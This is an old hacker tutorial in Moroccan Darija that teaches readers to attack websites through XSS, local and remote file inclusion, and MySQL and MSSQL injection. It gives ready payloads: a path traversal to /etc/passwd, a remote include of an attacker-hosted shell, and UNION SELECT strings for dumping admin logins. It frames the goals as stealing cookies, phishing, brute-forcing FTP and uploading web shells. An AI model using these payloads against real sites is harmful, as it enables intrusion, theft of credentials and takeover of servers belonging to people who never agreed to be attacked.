#####################################################################
## _______ ____ ##
## __ ___ / _____ \ / __ \ ##
## / \ _ _ ___ | |___ |/ | | ) ) ##
## | Y Y \| V_\ / _ Y| __ |(_)| |_/ / [A] ##
## |__|__|__ \ | ()| (_] | | \|| || __ \ ##
## \/_/ \___ | | | || | ) | ##
## \|/ |_/|_/ |/ ##
## ##
#####################################################################
## [Morocco] Web Vulnerabilities Exploiting ##
## -+-+-+-+-+- ##
## Created By Mr.aFiR (Moroccan Hacker) ##
## Email: q-_@hotmail.com ##
## Website: www.aFiR.me ##
## (c) -- 18/12/2oo9 ##
#####################################################################
# To read this with a good style, use Notepad++ & select the from language menu "MS INI file".
# Bach t9raw had fichier b style zwin, halloh b notepad++ & diro f language "MS INI file".
#
##-Mohtawayate
| #
| #-M09DIMA
| #-3ARD
| | #
| | #-XSS (all)
| | #-LFI (php)
| | #-RFI (php)
| | #-MySQLi (php)
| | #-MsSQLi (asp,aspx)
| |
| #-KHATIMA
| #-L3z
|
|-> Bismy Allah nbdaw :
[!] I. M09ADIMA :
Ch7al men merra tan dakhlo l chi site tay tla3 lina fih error
o matan fahmo fih walo (hada bansba l chi nass :) ).
Lyom jina n7abso had l problème. bach twaliw t3arfo kifache t3amlo
m3a les error khossosan f PHP.
Yallah khaliwna nbdaw 3ala barakati Allah.
[!] II. 3ARD :
[~] a. XSS (all):
XSS (Cross Site Scripting) howa ashal tagharat & li kayna f bzaf d les sites
li menhom des sites kbar bhal les banks ola charikat l kbar comme hotmail &
facebook. O had XSS sahla 7ddar 39lak chwiya m3aya :
Ex.:
parfois tanl9aw chi lien b7al hakka :
http://server/login.php?message=Invalid Login
& tanl9aw dik "Invalid Login" maktooba f chi blasa f la page.
Hadchi tay3ni ananna n9dro nt7kmo fiha & nghayroha ri men lien.
njarbo :
http://server/login.php?message=<script>alert('aFiR');</script>
ila mchat 7ta 3ta fenetre dial message fih "aFiR" rah hadik hiya li
tatsma XSS, 7it biha imkan lik tddi les cookies dial l admin ola users
dial chi site.
Lmanafi3 dial XSS : * tchfar biha les cookies (Cookies Stealing)
* tdir fiha iframe dial login (iframe Attacks)
* dir biha redirection l scam dialk (Phishing Redirections)
Hadi Salina M3aha, Ntmnna annak fhamti chi haja, sinon chrab lb7ar.
[~] b. LFI (php):
LFI (Local File Include) hadi chwiya 3yana mais wakha hakkak naf3a f ba3d
servers hit biha imkan lina n9raw ay fichier bchart maykonch PHP.
Ex.:
http://server/index.php?lang=fr
hadi tanradoha :
http://server/index.php?lang=aFiR
Ila 3tak error bhal hakka :
Warning : include('languages/aFiR.php') .../home/user/www/index.php on line x
require('languages/aFiR.php') .../home/user/www/index.php on line x
rah imkan t exploitih & t9ra "/etc/passwd"
http://server/index.php?lang=../../../../etc/passwd%00
ila kan safe_mode=OFF rah radi ikharjo lik les users dial server
& dik "%00" hiya bach tan raddo ".php" NULL y3ni matatb9ach
Lmanafi3 dial had l Vuln hiya anana n9raw /etc/passwd & nkhadmo bih
FTP Burte Force Attack li biha imkan njibo des login FTP.
Ila mafhamti hadi Tfi dak l pc o nod men temma | YALLAH! | :D
[~] c. RFI (php):
FRI (Remote File Include) hadi 3akss lowla, hadi fiha imma byad imma khal.
fl error dialha matykon hta dossier & imkan aussi hna ndiro LFI.
Ex.:
http://server/index.php?page=news
tanradoha :
http://server/index.php?page=aFiR
tat3ti error comme ça :
Warning : include('aFiR.php') ...
Warning : require('aFiR.php') ...
hada tay3ni imkan tkon RFI
nraj3o l lien :
http://server/index.php?page=http://hacker/shell.txt?
ila t executa lik shell llah iskhar, sinon rah Safe_mode=ON :s
& bach nraj3o ".php" NULL f RFI tan diro "?" f la fin d lien
[~] d. MySQLi (php):
MySQL Injection i9dar tjikom s3iba ila ma3mrkom khdamtoha, mais hiya raha sahla.
Mli tadkhol l chi site matala f lien dial /news.php?id=9
malli trad lien /news.php?id=9' radi itla3 error !
ja men ana l mobarmij ma3tach chorot l $id !
& ktab direct bhal haka :
$query = mysql_query("SELECT * FROM news WHERE id=$id");
y3ni imkan lina nghayro lmasar dial had l query & biha njibo login dial admin
awal haja tan9albo 3la 3adad la3mida li radi n diro ba3d "union select"
tandiro /news.php?id=9 order by 1-- Onb9aw radyin tal3ni tanzido f dik "1"
hta itla3 l error example tla3 error mli wslna "14" 3adad la3mida howa "13"
daba hna 3arfin blli "13" howa 3adad l a3mida tandiro :
/news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
daba radi n3arfo la3mida lmosaba ohiya l ar9am li radi tban f la page
daba tayji dawr dial ta5min dial name dial table fach kayn login dial l admin
/news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from table_name--
table_name tan 5amnoh men rassna i9dar ikon admin, users, user, administrator ...
mli tanjarbo f ta5min kif i5tafi l error = rah ta5min S7i7 ;)
Après ja ta5min dial login ol password dial admin, example 4 tayban f la page:
/news.php?id=-9 union select 1,2,3,col_name,5,6,7,8,9,10,11,12,13 from table_name--
col_name hiya ta5min dial login ola password :
Login : login, user, username, user_name, name, auth,...
Password : password, pass, passwd,...
Aprés matan 3arfo login tan9albo 3la Admin Panel li menha imkan n uploadiw shell dialna.
______________________________________________________________________________________________
|* Hado des commandes khassin ri b MySQL : |
|_____________________________________________________________________________________________|
| version() = tan3arfo biha la version dial Mysql server |
| datadir() = tan3arfo biha l masar dial mysql f server |
| concat() = tandamjo biha bzaf d la3mida f 1 L3amood Ex: concat(user,0x3a,pass) |
| load_file()= tan9raw biha les fichier Ex: load_file('/etc/passwd') |
|_____________________________________________________________________________________|
[~] e. MsSQLi (asp,aspx):
Bnesba l MsSQLi (MicroSoft SQL injection) tan tab3o nafss les etape dial MySQLi ri chi chorot :
1. "union select" = "union all select" (far9 bsiit).
2. "--" = "#" (partya dial commentaire bach n anulliw ma ba3d la query dialna).
3. F MsSQL les numero dial la3mida li m infectyin mataybanoch hta nkhamno table_name.
4. F hna matan khadmoch b les command dial mysql li 3titkom f lfo9.
Daba Salina, Lmli7 Ba3 Ora7.
[!] III. KHATIMA :
Ntmnna annakom fhamto chi haja fhad l cours d darija :) !
Ktabt dinmo bhal incha2 dial Arabic :D !
Li mafham ttawzza il7ag mo 7san lih ! YALLAH L7AG MOK ! hhhhhhhhh
9addit had Ze3t b darij awalan bach ifahmo wlad l blad & tanian bach
hta chi 9rd men dok L9rooda hachakom mayfham iwalliw ki LHmir
(cambo mayfham walo) :) khashom ri lodnin.
Akhir Haja radi tnod men dak l pc radi tamchi tn3ass onta tatfkar f
hadchi kif tfi9 sbbaH 3la l pc & 7awel tjrab ga3 ach dkhalti l rassk,
iwa nod men temma 9bal man khraj lik men l ecran :D.
Yallah Tla7o !
[!] IV. L3z :
L3z lik olga3 li 9ra had l paper & ntmna i3jabkom & tfahmoh mzian.
LLi mafham chi 7aja ra l website dialy sift menno ton message ;)
Finally, L3z to all my friends lli menhom :
"Dr.Crypter(3chiri), Love511(3ami), Dr.BoB-Hacker(sadi9i), ****(MyLove)..."
Li nsit madert smito hna, maykhafch rakom fl bal ;)
Nchofkom Next Time m3a chi haja jdida ;)
---------------------------------------------------------------------------------------------------
[x] Author : aFiR Abdel (Mr.aFiR)
[x] Email : q-_[at]hotmail[dot]com
[x] Website : www.aFiR.me
# if you have something to tell me, only contact me ;)
---------------------------------------------------------------------------------------------------
